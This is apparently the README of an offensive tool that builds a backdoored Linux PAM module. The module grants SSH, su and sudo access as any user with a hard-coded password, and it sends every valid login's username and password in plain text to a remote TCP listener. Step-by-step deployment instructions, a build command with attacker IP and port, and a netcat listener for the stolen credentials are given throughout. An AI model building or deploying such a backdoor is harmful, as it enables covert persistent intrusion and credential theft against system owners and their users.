# Pam-I-Am         
## Info / How to
This tool will create a backdoored pam module which will allow you to authenticate with a hard-coded credential.
It will also send valid credentials to a TCP listener for credential sniffing.
Since it is a Pam module you can use the hard-coded cred and or sniff creds for SSH and su / sudo commands.

To use this tool you must take the following steps:
1. Ensure you have build tools installed.
    - Tools can be installed using "apt-get install build-essential" on Debian/Ubuntu.
2. Detect the Pam version on the target machine.
    - This can be done with "dpkg -l | grep pam-modules" on Debian/Ubuntu.
    - You only need base version (for example: 1.3.0 or 1.1.8) nothing after the dash.
    - For a complete list of supported versions see: http://www.linux-pam.org/library
3. Run backdoor.sh as shown below in the "Usage" section.

4. Copy the newly created backdoored pam_unix.so file to your target machine.

5. Take advantage of your newly installed backdoor
    - Setup a TCP listener like netcat to catch the exfiltrated logons as shown in the "Usage" section below.
    - Use the hardcoded credential to SSH into the target machine as any user or to su / sudo as any user.

## Usage
- -v = Pam version
- -p = Hardcoded password for backdoor
- -i = IP to send plain text username and password to
- -x = Port to send plain text username and password to
To generate the backdoored pam_unix.so, just run:
```
./backdoor.sh  -v 1.1.8 -p B4kd00rz4d4yz -i 10.0.0.5 -x 4738
```
To catch the logins over TCP (k option not in all netcat builds):
```
nc -lvp 4738 -k 2>/dev/null
```

## Credit
Concept heavily inspired / based on prior work by zephrax: https://github.com/zephrax/linux-pam-backdoor

## TODO
- Encrypt data sent over TCP socket
- Cleanup code
- Add option for DNS exfil vs straight TCP